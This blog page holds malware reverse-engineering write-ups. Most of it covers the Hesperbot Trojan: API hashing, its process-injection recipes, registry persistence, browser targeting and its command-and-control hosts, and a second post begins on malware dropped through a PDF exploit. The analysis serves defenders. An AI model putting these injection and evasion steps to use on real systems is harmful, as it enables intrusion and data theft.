<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUAScAQafenGGcZqqi2FRmKp6T97npEHTKUktc3MFIn4L0xkqvkvHBxLJF6Kmq_cuFO896gpbP9zAJ0-Khw2rPm_6gNSsuU-axS1Px7hLOzLBSeeAZ666UE7AJZtl6Kpsr1wLIkBK/s1600/004PopulateIAT.png"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcUAScAQafenGGcZqqi2FRmKp6T97npEHTKUktc3MFIn4L0xkqvkvHBxLJF6Kmq_cuFO896gpbP9zAJ0-Khw2rPm_6gNSsuU-axS1Px7hLOzLBSeeAZ666UE7AJZtl6Kpsr1wLIkBK/s320/004PopulateIAT.png" width="320" /></a><br />
<br />
All the necessary APIs are then gathered and stored in its Import Address Table (IAT) using kernel32.LoadLibraryA and kernel32.GetProcAddress.<br />
<br />
Code execution is then transferred subsequently to the <b><i>injector </i></b>module at 0x0044744F.<br />
<br />
<h3>
The Injector</h3>
The Trojan hashes and stores various system information which can be used to identify the infected computer once it connects to a C&C server.<br />
<br />
<ul>
<li>computer name</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate</li>
<li>system version (like service pack number)</li>
<li>processor architecture (x86, AMD64, IA64)</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid</li>
<li>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\DigitalProductId</li>
</ul>
It creates multiple randomly generated mutex and semaphore strings with the following format<br />
<randommutex>.mutex<br />
<randomsemaphore>.semaphore<br />
<br />
A system infected with Hesperbot Trojan can be easily distinguished because of this.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWuxvUdTnQ1NmdZkvIz4BLu2aNxxoFVqPjm2EqhHB6FZoEJg51si4v9N-LFv6apTgtYuq5JcnUGcJ47-k2ZVMBHv42fOlMvCcI-iEqTh5NFU6TXpFGPldP-d4oC_nJLF_tQCHLS0v/s1600/MutexSemaphores.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjWuxvUdTnQ1NmdZkvIz4BLu2aNxxoFVqPjm2EqhHB6FZoEJg51si4v9N-LFv6apTgtYuq5JcnUGcJ47-k2ZVMBHv42fOlMvCcI-iEqTh5NFU6TXpFGPldP-d4oC_nJLF_tQCHLS0v/s320/MutexSemaphores.png" /></a><br />
<br />
It then creates two folders (Sun and a randomly generated directory) in which it store an encrypted copy of itself as <random>.bkp and <random>.dat. The folder location varies from operating systems:<br />
<br />
For WinXP:<br />
<br />
<ul>
<li>%ALLUSERSPROFILE%\Application Data\Sun\<random>.bkp</li>
<li>%ALLUSERSPROFILE%\Application Data\<RandomDirName>\<random>.dat</li>
</ul>
<br />
For Win7 and above:<br />
<br />
<ul>
<li>%ALLUSERSPROFILE%\Sun\<random>.bkp</li>
<li>%ALLUSERSPROFILE%\ RandomDirName>\<random>.dat</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglq3F-v45lermwnLfMrSmHLFtuscvjg4N89laEfbg2d2mx5RAgEdrndzUakmdkcuVjepft59kc1AJGmPb_Ezy0g1Acu9z-sxrERglIQEpAq-b-PgNr4yZEiUJPQIVzg9xRE_bzIwYS/s1600/datbkp.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglq3F-v45lermwnLfMrSmHLFtuscvjg4N89laEfbg2d2mx5RAgEdrndzUakmdkcuVjepft59kc1AJGmPb_Ezy0g1Acu9z-sxrERglIQEpAq-b-PgNr4yZEiUJPQIVzg9xRE_bzIwYS/s320/datbkp.png" /></a><br />
<br />
It will then generate a platform-specific loader code, by checking the OS architechture by using GetNativeSystemInfo.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69k-SB5yyQogmhyphenhyphen21WVlzo3Z8c2PlQynSEHul_NrwE1hcXgrEjYiC4v20_oxDu8mfOlwa8sK2U3z0QjDXaBz7zX9ztuYSTp0e2XalvTEhzNjeopOZl7MHrJCrTNyBhljs1O5D_U47/s1600/32x64bitCheck.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj69k-SB5yyQogmhyphenhyphen21WVlzo3Z8c2PlQynSEHul_NrwE1hcXgrEjYiC4v20_oxDu8mfOlwa8sK2U3z0QjDXaBz7zX9ztuYSTp0e2XalvTEhzNjeopOZl7MHrJCrTNyBhljs1O5D_U47/s320/32x64bitCheck.png" /></a><br />
<br />
Hesperbot has three ways to inject its core module to explorer.exe and these all depends whether cmdguard.sys or klif.sys exists in the system. Three scenarios are listed below<br />
<br />
<br />
<ul>
<li>SCENERIO 1: %systemroot%\system32\drivers\cmdguard.sys exists (Comodo Firewall Guard driver)</li>
<ul>
<li>copy procedure to high memory and transfer execution</li>
<li>spawn suspended process of explorer.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify explorer.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume suspended process using ntdll.ZwResumeThread</li>
</ul>
</ul>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPHBWUsqkvCMQHJ0TJJWzkiw0aUBHj-egUX9gzAUcO3DCcHa-M9RxgCzaClfMGPA3jPw_cbUzUDWvz22ZfbM_wJ3n9xY9HzSsJVIqRgfDMdGo-HFApxHYCzezYzulgluc34j-mH-r/s1600/cmdguard_sys.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtPHBWUsqkvCMQHJ0TJJWzkiw0aUBHj-egUX9gzAUcO3DCcHa-M9RxgCzaClfMGPA3jPw_cbUzUDWvz22ZfbM_wJ3n9xY9HzSsJVIqRgfDMdGo-HFApxHYCzezYzulgluc34j-mH-r/s320/cmdguard_sys.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqWWaNygXxvBLFVLrbVD-IxFlxoD-9bH2p2JvmiUGtRUd0sHGn6emkAhgFYhlkPzTc52xJoS3AiT9OXdywOCURF91LHjftS0rurzJL8twATFJpicOLJBSCM0KLPus09AuttXM7O6FC/s1600/JmpOffset.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqWWaNygXxvBLFVLrbVD-IxFlxoD-9bH2p2JvmiUGtRUd0sHGn6emkAhgFYhlkPzTc52xJoS3AiT9OXdywOCURF91LHjftS0rurzJL8twATFJpicOLJBSCM0KLPus09AuttXM7O6FC/s320/JmpOffset.png" /></a><br />
<ul>
<li>SCENARIO 2: %systemroot%\system32\drivers\klif.sys exists (Kaspersky Antivirus system driver)</li>
<ul>
<li>copy core procedure to memory</li>
<li>spawn suspended process of attrib.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify attrib.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume process of attrib.exe using ntdll.ZwResumeThread</li>
<li>injected code in attrib.exe uses kernel32.CreateRemoteThread in order to create a new thread that will inject the core module to explorer.exe</li>
</ul>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCEHL93dmSGmN5_c3hIqNr5R7eUOqGzQ5QmWBYkVptbGD1KDdLtMmELzeVONC9S6EjLxwJbKgkri1MC3dVfMFwiFG9AqCQtq1xNkAYDMSgBbC2QVpwg5MqDdbxvkvkhKN8BgeY36q/s1600/CreateProcAttrib.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCEHL93dmSGmN5_c3hIqNr5R7eUOqGzQ5QmWBYkVptbGD1KDdLtMmELzeVONC9S6EjLxwJbKgkri1MC3dVfMFwiFG9AqCQtq1xNkAYDMSgBbC2QVpwg5MqDdbxvkvkhKN8BgeY36q/s320/CreateProcAttrib.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGosKYc-aMhkeeyfA42d6BTwcFQMzZdO_Tde6LW74ifQw-w94pRAq96pFQL0dxhPDbpgd3DKQaW6BLjunGPQLFqNGh2YXgAJZYLMrOFEd391O31dQP_0vi0flTcgKK66Km-WYkO0KI/s1600/CreateRemoteThread.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGosKYc-aMhkeeyfA42d6BTwcFQMzZdO_Tde6LW74ifQw-w94pRAq96pFQL0dxhPDbpgd3DKQaW6BLjunGPQLFqNGh2YXgAJZYLMrOFEd391O31dQP_0vi0flTcgKK66Km-WYkO0KI/s320/CreateRemoteThread.png" /></a><br />
<ul>
<li>SCENARIO 3: cmdguard.sys and klif.sys do not exist</li>
<ul>
<li>copy core procedure to memory</li>
<li>spawn suspended process of attrib.exe using kernel32.CreateProcessW</li>
<li>craft bytes in stack that will jump to malware code in memory</li>
<li>modify attrib.exe entry-point and insert the crafted bytes from stack using kernel32.VirtualProtectEx and kernel32.WriteProcessMemory</li>
<li>resume process of attrib.exe using ntdll.ZwResumeThread</li>
<li>injected code in attrib.exe that spawns explorer.exe in suspended state</li>
<li>making use of windows messaging vulnerability to trigger shellcode execution into explorer.exe address space. (This is commonly known as PowerLoader injection <a href="http://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html">http://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html</a>)</li>
<li>the shellcode uses CreateThread and VirtualAlloc to pass execution the core module</li>
</ul>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq3gbxEoqp-IYUoOKpzLNDPYxHw5j-YS1muvUXBjKWAMagTEOUQeBA4RMPUw8wqGAnMkntS3Tob0ZdOMGy2Nam-C_IBbhzlBtLKEFJEGUEWtExg_5-G6n5pAv2Y3VvubgE5AcD7lL/s1600/shell_traywnd.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFq3gbxEoqp-IYUoOKpzLNDPYxHw5j-YS1muvUXBjKWAMagTEOUQeBA4RMPUw8wqGAnMkntS3Tob0ZdOMGy2Nam-C_IBbhzlBtLKEFJEGUEWtExg_5-G6n5pAv2Y3VvubgE5AcD7lL/s320/shell_traywnd.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsqvKXxAPBIBY8-0qHOsJ7ELjQFH_g7qgxqA_6w8NIiMGypjeRYKTNvSRgFyShNKG5Ca3d0gdQrb168fJhxpAY8a1jPBG8Tsjznpu82TCXakHhfh-c6RtbsUk2PZ3_WxojLD7dG2Q/s1600/shell_traywnd2.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZsqvKXxAPBIBY8-0qHOsJ7ELjQFH_g7qgxqA_6w8NIiMGypjeRYKTNvSRgFyShNKG5Ca3d0gdQrb168fJhxpAY8a1jPBG8Tsjznpu82TCXakHhfh-c6RtbsUk2PZ3_WxojLD7dG2Q/s320/shell_traywnd2.png" /></a><br />
<br />
For debugging purposes, these are the steps on how I got to trace the shell code:<br />
<br />
<div class="MsoListParagraph">
<!--[if !supportLists]-->1.<span style="font-size: 7pt;"> </span><o:p></o:p> First of all, know which shell code will be executed. For this sample of Hesperbot, the start of its shell code is at 0x0044A77C – E8 29 00 00 00</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lt-vedV0fj-X6Ey61ZH2Rl2ESxI7ffSjsvLpSJBDXZY7mK8JlW7aemcddeQ6GZIkrPwxRAi_zKenO6Y3SnQezkidHuNd1CMpZec7pyQxfNd3Tb4iWsVUHJ0eR5c2gjrSjK3LoGua/s1600/shellcode.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1lt-vedV0fj-X6Ey61ZH2Rl2ESxI7ffSjsvLpSJBDXZY7mK8JlW7aemcddeQ6GZIkrPwxRAi_zKenO6Y3SnQezkidHuNd1CMpZec7pyQxfNd3Tb4iWsVUHJ0eR5c2gjrSjK3LoGua/s320/shellcode.png" /></a><br />
2. Replace the first byte 0xE8 to 0xCC (int 3). Save this modified copy.<br />
<div class="MsoListParagraph">
3. In Ollydbg, goto Options->Just-in-time-debugging and click “Make OllyDbg just-in-time debugger” then exit Ollydbg.</div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicl0R6ZiFWsMWlSe95wxGajfhsElFrkI54NjOQLw33fpfNF_qzOS2syRPxA91zvfi-mbDOja3fbVXjySlD36dcutcCuV_LYBk4xZP-kYA1F8nJFQVi7QMSui9_zCLxYKjzbr6DFWx/s1600/OllyJustInTime.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgicl0R6ZiFWsMWlSe95wxGajfhsElFrkI54NjOQLw33fpfNF_qzOS2syRPxA91zvfi-mbDOja3fbVXjySlD36dcutcCuV_LYBk4xZP-kYA1F8nJFQVi7QMSui9_zCLxYKjzbr6DFWx/s1600/OllyJustInTime.png" /></a><br />
4. Now execute your modified copy of the malware and it should crash windows explorer.<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdZ5zM8RQhwzA-UMtl7ehLuKmgIwjYiRt34qPHTy17QbNu18Qjo9o-30y52LSAhi0EILvdHrvoQmQVeoOIZdKqdgNPqhCLQ2hyphenhyphenLm_YKxwii75RrL-xYhQbt4Ht3A3oxKRT-UN1A02/s1600/ExplorerCrash.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFdZ5zM8RQhwzA-UMtl7ehLuKmgIwjYiRt34qPHTy17QbNu18Qjo9o-30y52LSAhi0EILvdHrvoQmQVeoOIZdKqdgNPqhCLQ2hyphenhyphenLm_YKxwii75RrL-xYhQbt4Ht3A3oxKRT-UN1A02/s320/ExplorerCrash.png" /></a><br />
5. Hit the “Debug” button and Ollydbg should pop up, just replace back the modified byte from 0xCC to 0xE8 and start tracing that shell code!<br />
<br />
These are the hashes of APIs that are used by Hesperbot Trojan in order to protect itself from easy detection by AV vendors.<br />
<br />
<ul>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xB02814b6 = kernel32.ExpandEnvironmentStringsW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x002CFE2B = kernel32.CreateFileW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xB376CE13 = kernel32.lstrlenW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xA24F346A = kernel32.CreateProcessW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x107B9483 = kernel32.WriteProcessMemory</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x1A471325 = kernel32.VirtualProtectEx</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xFDEB2A69 = kernel32.IsProcessorFeaturePresent</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x8D70B719 = kernel32.IsWow64Process</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x4B892318 = kernel32.CreateRemoteThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x26662FCC = kernel32.CreateThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xDF894B12 = kernel32.VirtualAlloc</li>
<li><br /></li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x3708EE6B = ntdll.ZwCreateSection</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xC477C525 = ntdll.ZwMapViewofSection</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x2015436B = ntdll.ZwResumeThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xB85C56EA = ntdll.ZwTerminateProcess</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x3F66C5FF = ntdll.ZwGetContextThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xD1E48C8B = ntdll.ZwSetContextThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x4C7D8945 = ntdll.ZwDelayExecution</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x7B005F26 = ntdll._allmul</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x0BD5C7BD = ntdll.ZwQueryInformationProcess</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x87CE75D8 = ntdll.ZwClose</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xE3086B33 = ntdll.ZwOpenProcess</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x35013E23 = ntdll.ZwTerminateThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xA2E76D4C= ntdll.ZwOpenThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x6DD66096 = ntdll.ZwQueryInformationThread</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x8EAE85FE = ntdll.ZwReadVirtualMemory</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xAAD44E29 = ntdll.ZwOpenSection</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xB7EF35F4 = ntdll.RtlCreateUserThread</li>
<li><br /></li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x9CD6615A = user32.FindWindowA</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x4A4627DC = user32.GetWindowThreadProcessId</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x3CC18006 = user32.SendMessageW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x8252D56B = user32.SetWindowLongW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x1FFBFCD8 = user32.GetClassName</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x52BD91BC = user32.SystemParametersInfoW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0xD563318F = user32.RegisterClassExW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x835DB020 = user32.CreateWindowExW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x8252D56B = user32.GetMessageW</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x8252D56B = user32.TranslateMessage</li>
<li><span class="Apple-tab-span" style="white-space: pre;"> </span>0x2776DB53 = user32.DispatchMessageW</li>
</ul>
<br />
<h3>
The Hesperbot Core</h3>
Execution is then passed to the core module after injecting it to explorer.exe. Like always, it must gather first all the necessary APIs it needs by using kernel32.LoadLibrary and kernel32.GetProcAdress method.<br />
<br />
It will then set its priority level to THREAD_PRIORITY_ABOVE_NORMAL to give more priority to itself than most active threads in explorer.exe.<br />
<br />
It will also attempt to set explorer.exe’s integrity level to LOWINTEGRITYLEVEL_FULLACCESS, so that new processes (like other downloaded malicious modules) with higher integrity than explorer.exe can have read/write access to it.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdbOyMk6hbbbMdiax-yesydX1He3JV6TZW1PHQ0QvyKSZPfgXwoexyW9oUyAWg7tOCj9BONw5sIQ_JKlO3HiNTvrVsGKp-CD1QE3KWEdoN89r4mPDviVAL-Z53XFHczDEWcSJf6q9o/s1600/SetIntegrityLevel.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdbOyMk6hbbbMdiax-yesydX1He3JV6TZW1PHQ0QvyKSZPfgXwoexyW9oUyAWg7tOCj9BONw5sIQ_JKlO3HiNTvrVsGKp-CD1QE3KWEdoN89r4mPDviVAL-Z53XFHczDEWcSJf6q9o/s320/SetIntegrityLevel.png" /></a><br />
<br />
<br />
Integrity levels are a new kernel security feature introduced in Windows Vista. You can read more about it in <a href="https://en.wikipedia.org/wiki/Mandatory_Integrity_Control">https://en.wikipedia.org/wiki/Mandatory_Integrity_Control</a>.<br />
<br />
The core then creates a mutex for itself with the format Global\inst_<randomstring> and Global\<randomstring>.<br />
<br />
It then verifies which running process it is injected to. It does this by hashing its current process filename using its own hashing algorithm and comparing to a table of hashes found in its body. So far, these are the hashes of processes which I recovered from its table through trial and error. Understand that recovering these process names is near impossible because of how the hashing algorithm was designed by the malware author.<br />
<br />
<ul>
<li>0x11955DB8: explorer.exe</li>
<li>0XAAF840B5: csrss.exe</li>
<li>0X1FC97071: svchost.exe</li>
<li>0x537B492F: iexplore.exe</li>
<li>0x76379A9A: firefoxe.exe</li>
<li>0XCA846265: chrome.exe</li>
<li>0X6FB8169E: opera.exe</li>
<li>0X9544710B: browser.exe</li>
<li>0X78AB2C5C: webkit2webprocess.exe</li>
<li>0X2771AA06: maxthon.exe</li>
<li>0XB64FEEED: sleipnir.exe</li>
<li>0XE80C41EC: deepnet.exe</li>
<li>0X30B15DB3: seamonkey.exe</li>
<li>0X532A495F: k-meleon.exe</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihzRK16NMLYsN55k6eKVn36mnwZes1MeRx1Dbma9Nz9kO8_6UAPGo6iwKQ_1qrZRmqnJAuGz3y6CN96n76407MMSLdSq2yoBssXmVuJVgQaztXj309oH5_XBbVEmP1_PQbR0TcMfy5/s1600/hashTable.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihzRK16NMLYsN55k6eKVn36mnwZes1MeRx1Dbma9Nz9kO8_6UAPGo6iwKQ_1qrZRmqnJAuGz3y6CN96n76407MMSLdSq2yoBssXmVuJVgQaztXj309oH5_XBbVEmP1_PQbR0TcMfy5/s320/hashTable.png" /></a><br />
<br />
As you can see, most of these hashes are process names of known web browsers. This gives us a hint that it will try to monitor web activity at some point.<br />
<br />
The core module is the one responsible for creating a copy of the trojan in %windir%\<randomFolder>\<randomFileName>.exe. This executable is also referenced by a REGRUN entry at HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Run “randomValueName” to ensure auto execution on windows startup.<br />
<br />
It will check for a valid internet connection by querying websites like:<br />
<br />
<ul>
<li>http://wikipedia.org</li>
<li>http://facebook.com</li>
<li>http://google.com</li>
<li>http://microsoft.com</li>
</ul>
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxPxSkMmZnVbwcDmxFhk-34Y_BnQVryIyP7NMF3bkUIUAU3W5dULXBn8rhlJ3ef38Ywi7gApNu_-nSIawULV-vwe1Ok7POeTRT_j1PMCYc0FVxma3VmH3gzHK5tQ1Ry_T4aIICeFB/s1600/VerifyInternetConn.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFxPxSkMmZnVbwcDmxFhk-34Y_BnQVryIyP7NMF3bkUIUAU3W5dULXBn8rhlJ3ef38Ywi7gApNu_-nSIawULV-vwe1Ok7POeTRT_j1PMCYc0FVxma3VmH3gzHK5tQ1Ry_T4aIICeFB/s320/VerifyInternetConn.png" /></a><br />
<br />
It then attempts to connect to its control server using https service and port 443. Its control server can be any of the following:<br />
<br />
<ul>
<li>whoischeck.biz</li>
<li>192.31.186.116</li>
<li>188.241.112.29</li>
<li>5.63.152.44</li>
<li>96.43.141.186</li>
<li>94.126.178.29</li>
</ul>
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVctC_tjgXVTUbvwvYdGgQs60h_QxEBtprJLaZ220XyYchZ92kD1VFl91GVI0Y_FjtU-11Q1GvmlAKuC5_SXReh9GqQ21Zz2KDPQMVrRHW_p3Yoed28kUrkIgfZ7lQ82OoypS0MFo/s1600/whoischeck.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUVctC_tjgXVTUbvwvYdGgQs60h_QxEBtprJLaZ220XyYchZ92kD1VFl91GVI0Y_FjtU-11Q1GvmlAKuC5_SXReh9GqQ21Zz2KDPQMVrRHW_p3Yoed28kUrkIgfZ7lQ82OoypS0MFo/s320/whoischeck.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXduEIn30d2DaDpmM_SP2hE6CLlC-CGBLEJPDPonWi4NhZMGUA8E48npn5-SXmLBeHD83JmMjrf5VKGR8SduBk4uyFsMJkwhSkGw6Mi_ICC2AhML3GfYSzs5mbzCobJanRZa5Xv71N/s1600/HttpOpenRequest.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXduEIn30d2DaDpmM_SP2hE6CLlC-CGBLEJPDPonWi4NhZMGUA8E48npn5-SXmLBeHD83JmMjrf5VKGR8SduBk4uyFsMJkwhSkGw6Mi_ICC2AhML3GfYSzs5mbzCobJanRZa5Xv71N/s320/HttpOpenRequest.png" /></a><br />
<br />
If the default control server (which is whoischeck.biz) did not respond to the request, it continues to check for other control servers listed above using Domain Generator Algorithm (DGA) in which a random domain name is used in order to evade general antivirus detections.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFiD6E5iKnsCjrGkuybkjb2SUuZM7zQQgrsHRnwkrsc67g53N8N3t78BKHrG3R6_-98nWgnR1QH69yr8pcwrFY9GF_iutgtQAo8LREM0hN1AdM0JvBjsRRUnQq-XifO2Z07e6HetXX/s1600/RandomDomains.png"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFiD6E5iKnsCjrGkuybkjb2SUuZM7zQQgrsHRnwkrsc67g53N8N3t78BKHrG3R6_-98nWgnR1QH69yr8pcwrFY9GF_iutgtQAo8LREM0hN1AdM0JvBjsRRUnQq-XifO2Z07e6HetXX/s320/RandomDomains.png" /></a><br />
<br />
It will then send the following information after a successful connection handshake is established:<br />
<br />
<ul>
<li>Computername that will serve as the ID of the infected machine e.g. "WINXP-6F60CDCD2A3429D85B855BF7"</li>
<li>Bot name “tr-botnet”</li>
<li>Network adapter information like adapter name, ip address, gateway, dhcp server, etc.</li>
<li>Installed smart cards by using SCardEstablishContext, SCardListReadersW and SCardConnectW</li>
</ul>
<br />
<div>
This Trojan supposedly downloads other malicious modules from its control server like keylogger, screen recorder, Virtual Network Computing (VNC), network traffic interceptor, etc. However; as of this writing, its control servers seems to be taken down already and are not responding.</div>
<br />
<h3>
Conclusion</h3>
Reverse engineering hesperbot core is quite fascinating. It demonstrates numerous tricks up its sleeves to elude easy detection by most antivirus vendors like hashing of process names and needed APIs; encrypting and decrypting part of its codes in memory; and generating random domain names when connecting to its command-and-control server.<br />
<br />
It also demonstrates three techniques to process injection. These are via (1)CreateProcess-ResumeThread, (2) CreateRemoteThread, (3) and by exploiting window messaging vulnerability using FindWindow-“shell_traywnd” – SetWindowLong trick.<br />
<br />
<div style="text-align: right;">
<i><b>Christopher D. Del Fierro</b></i></div>
Anonymoushttp://www.blogger.com/profile/10653752703445056399noreply@blogger.com0tag:blogger.com,1999:blog-1227934427004236933.post-38230265542879942362013-12-06T08:16:00.000-08:002013-12-06T08:30:14.318-08:00PDF CVE-2013-5065 - Dropped BAD Malware<br />
This malware is definitely created by a professional as it has an advance method of installing itself. And the malware author knows that what he/she created is BAD.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZQZ85dFgeH9bRNc82H-PdcxXnys3ZJd9a_kNjUTgWE2fcWB3VR-7ff6cH-zaBsxy8P8zp7vNl9kaCqb2zrl8vhSAAMyAbkOoBWSnV1ldmEiNivOqzh-etNX6yREQqMrm1YKwuIdRqvLd/s1600/bad_signature.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyZQZ85dFgeH9bRNc82H-PdcxXnys3ZJd9a_kNjUTgWE2fcWB3VR-7ff6cH-zaBsxy8P8zp7vNl9kaCqb2zrl8vhSAAMyAbkOoBWSnV1ldmEiNivOqzh-etNX6yREQqMrm1YKwuIdRqvLd/s400/bad_signature.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<i>0x0BAD - Signature of ShellCode for data stealing.</i></div>
<br />
<b>Installation</b><br />
<br />
This malware was dropped by a <a href="http://www.antimalwarelab.com/2013/12/cve-2013-5065-pdf-exploit.html">PDF file</a> that takes advantage of a <a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5065">known vulnerability</a> which results to Privilege Escalation. To maintain its privilege to run as admin, it creates the following autostart key:<br />
<br />
Software\Microsoft\Windows NT\Currentversion\Winlogon<br />
Shell="explorer.exe, <malware_path_and_filename>"<br />
<br />
This malware inject its code to windows taskbar by searching for Shell_TrayWnd window handle. And also, It uses ZwQuerySystemInformation to get all the running processes in the system wherein it will calculate the hash of the names of running processes. The hashes will then be compared to the hardcoded list of hashes of executable files that will be targeted for code injection. Here are targeted executables and their corresponding hashes:<br />
<br />
69CD16BA - iexplore.exe<br />
7B6061F9 - firefox.exe<br />
880F19D2 - chrome.exe<br />
DD87014F - opera.exe<br />
74667F89 - explorer.exe<br />
<br />
This malware uses hashes instead of directly providing the API name that it needs. It uses the TIB (FS[0x18]) to get all the loaded dll modules. Below are the list of APIs and their corresponding hashes:<br />
<br />
1F8B758A - ntdll.dll<br />
B05FD69A - LdrGetDllHandle<br />
CCE8D5E4 - LdrLoadDll<br />
FBAF20FE - ZwSetInformationThread<br />
F84E6809 - ZwResumeThread<br />
251E0CC9 - ZwDelayExecution<br />
